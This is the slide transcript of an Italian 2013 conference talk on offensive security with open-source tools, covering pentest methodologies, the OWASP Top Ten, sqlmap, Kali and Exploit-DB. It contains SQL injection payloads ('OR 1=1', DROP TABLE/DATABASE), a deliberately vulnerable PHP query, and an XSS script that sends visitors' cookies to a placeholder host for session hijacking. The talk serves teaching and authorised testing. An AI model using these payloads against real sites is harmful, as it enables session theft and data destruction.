Andrea Zwirnerandrea@linkspirit.org @AndreaZwirnerPordenone FiereLinux Arena 2013Offensive Security con strumentiOpen Source
Andrea Zwirner● Master di certificazione OSCP – Offensive Security CertifiedProfessional● Professionista nel campo della s...
● Appassionato di sicurezza informatica ed Open Source● Collaborazione con ISECOM (Instiute for Security and OpenMethodolo...
Cosè la sicurezza informatica – versione WikipediaRamo dellinformatica che si occupa● dellanalisi delle vulnerabilità, dei...
Cosè la sicurezza informaticaScienza inesatta che si occupa di garantire●C O N F I D E N Z I A L I T A C O N F I D E N Z I...
Esempi di attacchi alla confidenzialità dellinformazione● Ottenere accesso ad informazioni senza disporre delle autorizzaz...
Esempi di attacchi allintegrità dellinformazione● Ottenere la possibilità di alterare o eliminare informazioni senzadispor...
Esempi di attacchi alla disponibilità dellinformazione● Ottenere la possibilità di interrompere lerogazione di un servizio...
Note legaliReato di accesso abusivo ad un sistema informatico o telematico● Punito dallart. 615-ter del Codice Penale● Pen...
Esclusione di responsabilitàQuanto descritto in questa presentazione puòessere applicato solo su sistemi informatici dipro...
Sicurezza informatica difensiva – descrizione● Definizione di policy di accesso a servizi e informazioni● quali permessi s...
Sicurezza informatica difensiva – effetti percepiti● Forte senso di sicurezza indotto dalla qualità percepita● ottime camp...
Sicurezza informatica difensiva – effetti reali● Mancata rilevazione di errori di configurazione● Obsolescenza delle metod...
Sicurezza informatica difensiva – effetti reali● Mancata rilevazione di errori di configurazione● Obsolescenza delle metod...
● Come prima, linfrastruttura viene progettata ed implementata concriterio, applicando tutte le migliori prassiSicurezza i...
● Come prima, linfrastruttura viene progettata ed implementata concriterio, applicando tutte le migliori prassiP E R O  P ...
CI SI METTE NEI PANNI DELLATTACCANTE E SI CERCA DICI SI METTE NEI PANNI DELLATTACCANTE E SI CERCA DIVIOLARE IL PROPRIO SIS...
OSSTMMOpen Source Security Testing Methodology ManualLicenza: Creative Commons 3.0PTESPenetration Testing Execution Standa...
● Sviluppato da ISECOM in oltre 10 anni (attualmente ver. 3)● Standard internazionale de-facto per le verifiche di sicurez...
● Standard nuovo ed in fase di sviluppo, ma già molto utilizzatoin ambito IT Security● Definisce linee guida utili sia per...
● Ricognizione di base (information gathering, enumeration)● Ricostruzione della struttura interna dellazienda e della ret...
● Associazione senza scopo di lucro● Missione: aumentare la visibilità relativa la sicurezza delsoftware al fine di permet...
● Spiega come effettuare web application penetration testrapidi, mirati ed efficaci● Indirizzata a sviluppatori e beta tes...
● Descrive le dieci vulnerabilità valutate come più rischiose(non comuni) in ambito web application● Finalizzato ad educar...
● A1: Injection● A2: Broken Authentication and Session Management● A3: Cross-Site Scripting (XSS)● A4: Insecure Direct Obj...
● Avviene quando unapplicazione invia dati non fidati ad un interprete● Esempi: SQL, LDAP, chiamate al S.O., argomenti a c...
● Avviene quando unapplicazione invia dati non fidati ad un interprete● Esempi: SQL, LDAP, chiamate al S.O., argomenti a c...
● Avviene quando unapplicazione invia dati non fidati ad un interprete● Esempi: SQL, LDAP, chiamate al S.O., argomenti a c...
● Avviene quando unapplicazione invia dati non fidati ad un interprete● Esempi: SQL, LDAP, chiamate al S.O., argomenti a c...
Injection funPronto, qui è la scuola di suo figlio, abbiamo qualche problema informatico.Oh, mi dica... Robert ha mica rot...
Injection funZU 0666,0,0); DROP DATABASE TABLICE; --Pordenone Fiere – Linux Arena 2013Offensive Security con strumenti Ope...
sqlmap - Open Source SQL Injection● Pieno supporto per MySQL, Oracle, PostgreSQL,Microsoft SQL Server, Microsoft Access, S...
● Avviene quando unapplicazione web include in una pagina dati fornitida un utente (ogni social network) senza averli vali...
● Esempio classico (ma, di nuovo, ancora funzionante e molto in voga!)● Qualunque form il cui contenuto (non validato) ven...
● Esempio classico (ma, di nuovo, ancora funzionante e molto in voga!)● Qualunque form il cui contenuto (non validato) ven...
Ed ecco il risultato: abbiamo appena eseguito codice lato client sulcomputer di ogni visitatore del sitoA3: Cross-Site Scr...
E un attacco così famoso che ha anche un profilo professionale suLinkedInA3: Cross-Site Scripting (XSS)Pordenone Fiere – L...
● Cosa sarebbe successo se nel campo avessimo messo un bel:<script>new Image.src=”http://IP/pippo.php?cookie= + document.c...
● Cosa sarebbe successo se nel campo avessimo messo un bel:<script>new Image.src=”http://IP/pippo.php?cookie= + document.c...
● tamperdata● Addon per Firefox che permette di vedere e modificare gli headerHTTP/HTTPS ed i parametri POST● firebug● Too...
Back|Track Linux BackBox LinuxKali Linux● Distribuzioni Linux appositamente sviluppate per lesecuzione di test disicurezza...
Pordenone Fiere – Linux Arena 2013Offensive Security con strumenti Open Source42
● Distribuzione Linux Live installabile, per attività di penetration test,intelligence e forensics analisys● Basata su Ubu...
Pordenone Fiere – Linux Arena 2013Offensive Security con strumenti Open Source44
● Basata prima su Slax Linux, portata in seguito sotto Ubuntu● Distribuzione Linux Live installabile, per attività di pene...
Pordenone Fiere – Linux Arena 2013Offensive Security con strumenti Open Source46
● Evoluzione di Back|Track Linux● Derivata da Debian Wheezy, forka meno pacchetti possibile, aderisceai suoi standard di s...
The Exploit DatabasePordenone Fiere – Linux Arena 2013Offensive Security con strumenti Open Source48
● Raccoglie exploit per ogni falla di sicurezza rilevata per ogni softwaresu ogni piattaforma e la indicizza in maniera ef...
Back|Track ed integrazione con Exploit-DBPordenone Fiere – Linux Arena 2013Offensive Security con strumenti Open Source50
● Come per ogni altro campo dellinformatica, anche per la sicurezza ilcontributo dato dallOpen Source è stato incommensura...
Domande? Dubbi? Perplessità?Pordenone Fiere – Linux Arena 2013Offensive Security con strumenti Open Source52
Andrea Zwirnerandrea@linkspirit.org @AndreaZwirnerPordenone FiereLinux Arena 2013Offensive Security con strumentiOpen Source
Upcoming SlideShare
Loading in …5
×

Offensive security con strumenti open source

813 views

Published on

Pordenone Fiere – Linux Arena 2013
Offensive Security con strumenti Open Source - Talk di Andrea Zwirner

Published in: Education
0 Comments
0 Likes
Statistics
Notes
  • Be the first to comment

  • Be the first to like this

No Downloads
Views
Total views
813
On SlideShare
0
From Embeds
0
Number of Embeds
6
Actions
Shares
0
Downloads
30
Comments
0
Likes
0
Embeds 0
No embeds

No notes for slide

Offensive security con strumenti open source

  1. 1. Andrea Zwirnerandrea@linkspirit.org @AndreaZwirnerPordenone FiereLinux Arena 2013Offensive Security con strumentiOpen Source
  2. 2. Andrea Zwirner● Master di certificazione OSCP – Offensive Security CertifiedProfessional● Professionista nel campo della sicurezza informatica: “security auditor epenetration tester ”● Fondatore di Linkspirit● Security auditing, security advising e penetration testing● Training in corsi di sicurezza informatica● Articolista e revisore per la rivista di settore PenTest MagazinePordenone Fiere – Linux Arena 2013Offensive Security con strumenti Open Source2
  3. 3. ● Appassionato di sicurezza informatica ed Open Source● Collaborazione con ISECOM (Instiute for Security and OpenMethodologies)● Collaborazione al progetto Hacker Highschool – Security awarenessfor teensPordenone Fiere – Linux Arena 2013Offensive Security con strumenti Open Source3Andrea Zwirner
  4. 4. Cosè la sicurezza informatica – versione WikipediaRamo dellinformatica che si occupa● dellanalisi delle vulnerabilità, dei rischi e delle minacce chepossono affliggere un sistema informatico● della protezione dellintegrità del software di un sistemainformatico● della protezione dei dati contenuti in un sistema informatico o daesso scambiati● della protezione di un sistema informatico da attacchi di softwaremalevoliPordenone Fiere – Linux Arena 2013Offensive Security con strumenti Open Source4
  5. 5. Cosè la sicurezza informaticaScienza inesatta che si occupa di garantire●C O N F I D E N Z I A L I T A C O N F I D E N Z I A L I T A ●I N T E G R I T A I N T E G R I T A ●D I S P O N I B I L I T A D I S P O N I B I L I T A dellinformazione.Pordenone Fiere – Linux Arena 2013Offensive Security con strumenti Open Source5
  6. 6. Esempi di attacchi alla confidenzialità dellinformazione● Ottenere accesso ad informazioni senza disporre delle autorizzazioninecessarie● Esempi● leggere dati in transito sul canale di comunicazione (sniffing)● decodificare dati crittografati mediante attacchi alle chiavi(dizionari, brute force, rainbow tables)Pordenone Fiere – Linux Arena 2013Offensive Security con strumenti Open Source6
  7. 7. Esempi di attacchi allintegrità dellinformazione● Ottenere la possibilità di alterare o eliminare informazioni senzadisporre delle autorizzazioni necessarie● Esempi● modificare o alterare dati in transito sul canale dicomunicazione● Esempio eccezionale è stato sslstrip di Moxie Marlinspike● modificare o eliminare dati residenti nel sistemaPordenone Fiere – Linux Arena 2013Offensive Security con strumenti Open Source7
  8. 8. Esempi di attacchi alla disponibilità dellinformazione● Ottenere la possibilità di interrompere lerogazione di un servizio obloccare un sistema● Esempi● alterare o eliminare dati o configurazioni di importanza criticaper il funzionamento del sistema;● sferrare attacchi mirati ad esaurire le risorse computazionali odi rete del sistema (DoS, DDoS);Pordenone Fiere – Linux Arena 2013Offensive Security con strumenti Open Source8
  9. 9. Note legaliReato di accesso abusivo ad un sistema informatico o telematico● Punito dallart. 615-ter del Codice Penale● Pena prevista: da 1 a 3 anni di reclusione● Aggravante per il danneggiamento dei dati o interruzione,anche parziale, del sistema:● Pena prevista: da 1 a 5 anni di reclusionePordenone Fiere – Linux Arena 2013Offensive Security con strumenti Open Source9
  10. 10. Esclusione di responsabilitàQuanto descritto in questa presentazione puòessere applicato solo su sistemi informatici diproprietà o dietro rilascio di autorizzazionescritta del legale proprietario degli stessi.Il relatore non si assume alcuna responsabilitàdi qualunque eventuale abuso delle informazioniriportate in questa presentazione.Pordenone Fiere – Linux Arena 2013Offensive Security con strumenti Open Source10
  11. 11. Sicurezza informatica difensiva – descrizione● Definizione di policy di accesso a servizi e informazioni● quali permessi servono per fare cosa● Difesa perimetrale dellinfrastruttura● configurazione delle apparecchiature di rete mediante un modellodi progettazione architetturale ritenuto sicuro● Difesa interna dellinfrastruttura● Installazione di apparecchiature e software anti intrusione edinfezione● Formazione degli utenti finali (troppo raramente)Pordenone Fiere – Linux Arena 2013Offensive Security con strumenti Open Source11
  12. 12. Sicurezza informatica difensiva – effetti percepiti● Forte senso di sicurezza indotto dalla qualità percepita● ottime campagne di marketing dei produttori● ingenti costi sostenuti● un sacco di nuove lucine lampeggianti in sala datiPordenone Fiere – Linux Arena 2013Offensive Security con strumenti Open Source12
  13. 13. Sicurezza informatica difensiva – effetti reali● Mancata rilevazione di errori di configurazione● Obsolescenza delle metodologie di difesa implementate● Rapida obsolescenza delle apparecchiature installate● Scoperta di bug di sicurezza e produzione relativi exploit per i servizierogatiPordenone Fiere – Linux Arena 2013Offensive Security con strumenti Open Source13
  14. 14. Sicurezza informatica difensiva – effetti reali● Mancata rilevazione di errori di configurazione● Obsolescenza delle metodologie di difesa implementate● Rapida obsolescenza delle apparecchiature installate● Scoperta di bug di sicurezza e produzione relativi exploit per i servizierogatiC O N C L U S I O N EC O N C L U S I O N EVENGONO LASCIATE MILLE PORTE APERTEVENGONO LASCIATE MILLE PORTE APERTEPordenone Fiere – Linux Arena 2013Offensive Security con strumenti Open Source14
  15. 15. ● Come prima, linfrastruttura viene progettata ed implementata concriterio, applicando tutte le migliori prassiSicurezza informatica offensivaPordenone Fiere – Linux Arena 2013Offensive Security con strumenti Open Source15
  16. 16. ● Come prima, linfrastruttura viene progettata ed implementata concriterio, applicando tutte le migliori prassiP E R O P O I S I V E R I F I C A C H EP E R O P O I S I V E R I F I C A C H ET U T T O S I A E F F E T T I V A M E N T E S I C U R OT U T T O S I A E F F E T T I V A M E N T E S I C U R OSicurezza informatica offensivaPordenone Fiere – Linux Arena 2013Offensive Security con strumenti Open Source16
  17. 17. CI SI METTE NEI PANNI DELLATTACCANTE E SI CERCA DICI SI METTE NEI PANNI DELLATTACCANTE E SI CERCA DIVIOLARE IL PROPRIO SISTEMA PER TROVARNE LE FALLEVIOLARE IL PROPRIO SISTEMA PER TROVARNE LE FALLE● Il sistema informatico viene quindi verificato da uno o più esperti(penetration tester) che utilizzano gli stessi● Metodologie● Strumentiutilizzati dagli attaccanti reali al fine di trovarne le vulnerabilitàSicurezza informatica offensiva: la metodologiaPordenone Fiere – Linux Arena 2013Offensive Security con strumenti Open Source17
  18. 18. OSSTMMOpen Source Security Testing Methodology ManualLicenza: Creative Commons 3.0PTESPenetration Testing Execution StandardLicenza: GNU Free Documentation License 1.2OWASPOpen Web Application Security ProjectLicenza: Creative Commons 3.0Metodologie Open Source per il penetration testingPordenone Fiere – Linux Arena 2013Offensive Security con strumenti Open Source18
  19. 19. ● Sviluppato da ISECOM in oltre 10 anni (attualmente ver. 3)● Standard internazionale de-facto per le verifiche di sicurezzaoperativa (di pressoché qualunque cosa!)● Utilizzato in tutto il mondo per security audit di sistemi di governi,pubblica amministrazione, scuole ed aziende di ogni dimensione● In fase di standardizzazione da parte dellISO ad integrare la famigliadi standard di sicurezza delle informazioni ISO/IEC 27000● 27001 – Information security management systems requirements● 27002 – Code of practice for information security managementOpen Source Security Testing Methodology ManualPordenone Fiere – Linux Arena 2013Offensive Security con strumenti Open Source19
  20. 20. ● Standard nuovo ed in fase di sviluppo, ma già molto utilizzatoin ambito IT Security● Definisce linee guida utili sia per il mondo IT sia per quelloBusiness● Offre al penetration tester uno standard solido per il correttosvolgimento del security audit● Offre al mondo business solidi criteri di valutazione sulla qualità dellavoro proposto e svolto● Apre un canale di comunicazione omogeneo tra i due mondi definendoun linguaggio comunePenetration Testing Execution StandardPordenone Fiere – Linux Arena 2013Offensive Security con strumenti Open Source20
  21. 21. ● Ricognizione di base (information gathering, enumeration)● Ricostruzione della struttura interna dellazienda e della rete● Ricognizione specifica su persone e macchine enumerate● Ricerca di errori nella configurazione di apparati o servizi● Stesura della mappa delle vulnerabilità● Ricerca, scrittura ed esecuzione di exploit● Raccolta delle evidenze (proof of concept – PoC)● Stesura del reportIl processo di audit - compendio OSSTMM e PTESPordenone Fiere – Linux Arena 2013Offensive Security con strumenti Open Source21
  22. 22. ● Associazione senza scopo di lucro● Missione: aumentare la visibilità relativa la sicurezza delsoftware al fine di permettere di prendere decisioni informatead imprese ed individui● Attiva nel campo della ricerca e divulgazione della cultura dellasicurezza partecipando a conferenze in tutto il mondo● Attualmente gestisce oltre 20 progetti legati alla sicurezza relativi alinguaggi, librerie, API, best practices, auditing, etc, suddivisi in● PROTECT – tools e documenti relativi la protezione da minacce● DETECT – tools e documenti relativi la rilevazione di difetti● LIFE CYCLE – tools e documenti per implementare attività disicurezza nel ciclo di sviluppo del softwareOpen Web Application Security ProjectPordenone Fiere – Linux Arena 2013Offensive Security con strumenti Open Source22
  23. 23. ● Spiega come effettuare web application penetration testrapidi, mirati ed efficaci● Indirizzata a sviluppatori e beta tester● Rilasciata in PDF, ma mantenuta in modalità wiki, in manierada permetterne il costante aggiornamento● Raccoglie il consenso di migliaia di esperti nel mondo circa lemodalità di rilevazione di minacce di sicurezza nel softwareOWASP – Testing ProjectPordenone Fiere – Linux Arena 2013Offensive Security con strumenti Open Source23
  24. 24. ● Descrive le dieci vulnerabilità valutate come più rischiose(non comuni) in ambito web application● Finalizzato ad educare sviluppatori, designer, manager edorganizzazioni circa le problematiche trattate● Fornisce linee guida per la verifica della presenza delleproblematiche selezionate e come prevenirleOWASP – Top Ten ProjectPordenone Fiere – Linux Arena 2013Offensive Security con strumenti Open Source24
  25. 25. ● A1: Injection● A2: Broken Authentication and Session Management● A3: Cross-Site Scripting (XSS)● A4: Insecure Direct Object References● A5: Security Misconfiguration● A6: Sensitive Data Exposure● A7: Missing Function Level Access Control● A8: Cross-Site Request Forgery (CSRF)● A9: Using Known Vulnerable Components● A10: Unvalidated Redirects and ForwardsOWASP Top Ten 2013 – RC1Pordenone Fiere – Linux Arena 2013Offensive Security con strumenti Open Source25
  26. 26. ● Avviene quando unapplicazione invia dati non fidati ad un interprete● Esempi: SQL, LDAP, chiamate al S.O., argomenti a comandi, etcA1: InjectionPordenone Fiere – Linux Arena 2013Offensive Security con strumenti Open Source26
  27. 27. ● Avviene quando unapplicazione invia dati non fidati ad un interprete● Esempi: SQL, LDAP, chiamate al S.O., argomenti a comandi, etc● Esempio – SQL Injection superclassica (ma si trova ancora, molto!)$nome = $_POST[nome];$query = "SELECT * FROM t WHERE nome=" + $nome + "";$result = mysql_query($query);A1: InjectionPordenone Fiere – Linux Arena 2013Offensive Security con strumenti Open Source27
  28. 28. ● Avviene quando unapplicazione invia dati non fidati ad un interprete● Esempi: SQL, LDAP, chiamate al S.O., argomenti a comandi, etc● Esempio – SQL Injection superclassica (ma si trova ancora, molto!)$nome = $_POST[nome];$query = "SELECT * FROM t WHERE nome=" + $nome + "";$result = mysql_query($query);Pacifico, ma cosa succederebbe se io mi chiamassiAndrea OR 1=1 --?A1: InjectionPordenone Fiere – Linux Arena 2013Offensive Security con strumenti Open Source28
  29. 29. ● Avviene quando unapplicazione invia dati non fidati ad un interprete● Esempi: SQL, LDAP, chiamate al S.O., argomenti a comandi, etc● Esempio – SQL Injection superclassica (ma si trova ancora, molto!)$nome = $_POST[nome];$query = "SELECT * FROM t WHERE nome=" + $nome + "";$result = mysql_query($query);Pacifico, ma cosa succederebbe se io mi chiamassiAndrea OR 1=1 --?A1: InjectionSELECT * FROM t WHERE nome= Andrea OR 1=1 --Pordenone Fiere – Linux Arena 2013Offensive Security con strumenti Open Source29
  30. 30. Injection funPronto, qui è la scuola di suo figlio, abbiamo qualche problema informatico.Oh, mi dica... Robert ha mica rotto qualcosa?In un certo senso... Senta, suo figlio si chiama veramenteRobert); DROP TABLE Students; --?…Pordenone Fiere – Linux Arena 2013Offensive Security con strumenti Open Source30
  31. 31. Injection funZU 0666,0,0); DROP DATABASE TABLICE; --Pordenone Fiere – Linux Arena 2013Offensive Security con strumenti Open Source31
  32. 32. sqlmap - Open Source SQL Injection● Pieno supporto per MySQL, Oracle, PostgreSQL,Microsoft SQL Server, Microsoft Access, SQLite,Firebird, Sybase e SAP MaxDB● Supporto per le tecniche di SQL Injection:● Boolean based blind, time based blind, UNION query, error-based,stacked query e out of band● Possibilità di tracciare lintera struttura dei database serviti dal motore● Supporto per dump di intere tabelle, range di record o colonnespecifiche● Supporto per il download/upload di qualunque file sul server nei casi diMySQL, PostgreSQL o Microsoft SQL ServerPordenone Fiere – Linux Arena 2013Offensive Security con strumenti Open Source32
  33. 33. ● Avviene quando unapplicazione web include in una pagina dati fornitida un utente (ogni social network) senza averli validati.● E un attacco client-side (JavaScript, ActiveX, Java, VBScript, etc)● Ne esistono di tre tipi:● Stored XSS – persistenti a database (forum, log, campi dicommento, etc)● Reflected XSS – altri vettori dattacco (es. email) che fannoeffettuare la richiesta HTTP forgiata in maniera da ottenere larisposta che esegue il codice client-side● DOM based – che modificano lambinente DOM (Document ObjectModel) del browserA3: Cross-Site Scripting (XSS)Pordenone Fiere – Linux Arena 2013Offensive Security con strumenti Open Source33
  34. 34. ● Esempio classico (ma, di nuovo, ancora funzionante e molto in voga!)● Qualunque form il cui contenuto (non validato) venga poi servito in unapagina● Nome: Andrea● Cognome: <script>alert(XSS);</script>A3: Cross-Site Scripting (XSS)Pordenone Fiere – Linux Arena 2013Offensive Security con strumenti Open Source34
  35. 35. ● Esempio classico (ma, di nuovo, ancora funzionante e molto in voga!)● Qualunque form il cui contenuto (non validato) venga poi servito in unapagina● Nome: Andrea● Cognome: <script>alert(XSS);</script>● La pagina html risultante quindi conterrà qualcosa tipo:<html>...<p>Andrea <script>alert(XSS);</script> èpassato di qui.</p>...</html>A3: Cross-Site Scripting (XSS)Pordenone Fiere – Linux Arena 2013Offensive Security con strumenti Open Source35
  36. 36. Ed ecco il risultato: abbiamo appena eseguito codice lato client sulcomputer di ogni visitatore del sitoA3: Cross-Site Scripting (XSS)Pordenone Fiere – Linux Arena 2013Offensive Security con strumenti Open Source36
  37. 37. E un attacco così famoso che ha anche un profilo professionale suLinkedInA3: Cross-Site Scripting (XSS)Pordenone Fiere – Linux Arena 2013Offensive Security con strumenti Open Source37
  38. 38. ● Cosa sarebbe successo se nel campo avessimo messo un bel:<script>new Image.src=”http://IP/pippo.php?cookie= + document.cookie +&location= + document.location”</script>A3: Cross-Site Scripting (XSS)Pordenone Fiere – Linux Arena 2013Offensive Security con strumenti Open Source38
  39. 39. ● Cosa sarebbe successo se nel campo avessimo messo un bel:<script>new Image.src=”http://IP/pippo.php?cookie= + document.cookie +&location= + document.location”</script>AVREMMO RUBATO LA SESSIONE AL VISITATOREAVREMMO RUBATO LA SESSIONE AL VISITATORECi siamo fatti spedire i cookie relativi il documento aperto, ossia iparametri relativi la sua sessione sul sitoA3: Cross-Site Scripting (XSS)Pordenone Fiere – Linux Arena 2013Offensive Security con strumenti Open Source39
  40. 40. ● tamperdata● Addon per Firefox che permette di vedere e modificare gli headerHTTP/HTTPS ed i parametri POST● firebug● Tool che si integra con firefox per il debugging delle pagine web.Permette di modificare, debuggare e monitorare CSS, HTML,JavaScript e cookie in modalità live● Usando queste estensioni di firefox possiamo impostarci i parametri disessione dellutente, quindi andare a visitare il sito impersonandolo.(ecco perché il logout è importante)Tamperdata, firebugPordenone Fiere – Linux Arena 2013Offensive Security con strumenti Open Source40
  41. 41. Back|Track Linux BackBox LinuxKali Linux● Distribuzioni Linux appositamente sviluppate per lesecuzione di test disicurezza offensiva (ed altro: analisi forense, OSINT)● Sono toolbox ordinati (in maniera maniacale) di strumenti Open Source(e non) utilizzabili nellambito del penetration testStrumenti Open Source per il penetration testingPordenone Fiere – Linux Arena 2013Offensive Security con strumenti Open Source41
  42. 42. Pordenone Fiere – Linux Arena 2013Offensive Security con strumenti Open Source42
  43. 43. ● Distribuzione Linux Live installabile, per attività di penetration test,intelligence e forensics analisys● Basata su Ubuntu e progettata per essere leggera e prestante● Meno matura di Back|Track, ma molto promettente● Più aperta di Back|Track dal punto di vista dello sviluppoBackBox Linux – introduzionePordenone Fiere – Linux Arena 2013Offensive Security con strumenti Open Source43
  44. 44. Pordenone Fiere – Linux Arena 2013Offensive Security con strumenti Open Source44
  45. 45. ● Basata prima su Slax Linux, portata in seguito sotto Ubuntu● Distribuzione Linux Live installabile, per attività di penetration test,intelligence e forensics analisys con oltre 600 tools diponibili● Aderente agli standard OSSTMM, OWASP ed OSINT● Open Source, ma con team di sviluppo piuttosto chiuso (sviluppata egestita da due società del settore)● Utilizzata da agenzie di intelligence e da reparti governativi delladifesa, oltre che da centinaia di migliaia di professionisti, ricercatori edappassionati di sicurezza in tutto il mondoBack|Track Linux – introduzionePordenone Fiere – Linux Arena 2013Offensive Security con strumenti Open Source45
  46. 46. Pordenone Fiere – Linux Arena 2013Offensive Security con strumenti Open Source46
  47. 47. ● Evoluzione di Back|Track Linux● Derivata da Debian Wheezy, forka meno pacchetti possibile, aderisceai suoi standard di sviluppo, ne eredita le linee giuda● Aderisce al FHS (Filesystem Hierarchy Standard) – non più /pentest● Kernel patch per injection – aircrack-ng● Supporto per ARMEL e ARMHF● Raspberry Pi – ODROID U2 – Samsung Chromebook ed altri● Ottima documentazione e comunità attivaKali Linux – penetration testing redefinedPordenone Fiere – Linux Arena 2013Offensive Security con strumenti Open Source47
  48. 48. The Exploit DatabasePordenone Fiere – Linux Arena 2013Offensive Security con strumenti Open Source48
  49. 49. ● Raccoglie exploit per ogni falla di sicurezza rilevata per ogni softwaresu ogni piattaforma e la indicizza in maniera efficace per la navigazione● Contiene exploit in formato sorgente (Open Source) indicizzati in basea piattaforma, tipologia (remota/locale), software di riferimento ed altri● Contiene oltre 100 documenti relativi la sicurezza offensiva in ogniambito esistente (server, software, API, mobile, etc)● Un punto di riferimento per penetration tester, ricercatori edappassionati di sicurezza offensiva (ed hacker..)The Exploit Database – introduzionePordenone Fiere – Linux Arena 2013Offensive Security con strumenti Open Source49
  50. 50. Back|Track ed integrazione con Exploit-DBPordenone Fiere – Linux Arena 2013Offensive Security con strumenti Open Source50
  51. 51. ● Come per ogni altro campo dellinformatica, anche per la sicurezza ilcontributo dato dallOpen Source è stato incommensurabile.● La filosofia di condivisione della conoscenza dellOpen Source haportato a:● definizione di metodologie tanto efficaci che sono diventatistandard internazionali● sviluppo di centinaia e software e tool aderenti agli standard edutilizzati da professionisti, aziende e governi● divulgazione di una cultura per la sicurezza e la tutela dellapropria privacy in reteMorale della favolaPordenone Fiere – Linux Arena 2013Offensive Security con strumenti Open Source51
  52. 52. Domande? Dubbi? Perplessità?Pordenone Fiere – Linux Arena 2013Offensive Security con strumenti Open Source52
  53. 53. Andrea Zwirnerandrea@linkspirit.org @AndreaZwirnerPordenone FiereLinux Arena 2013Offensive Security con strumentiOpen Source

×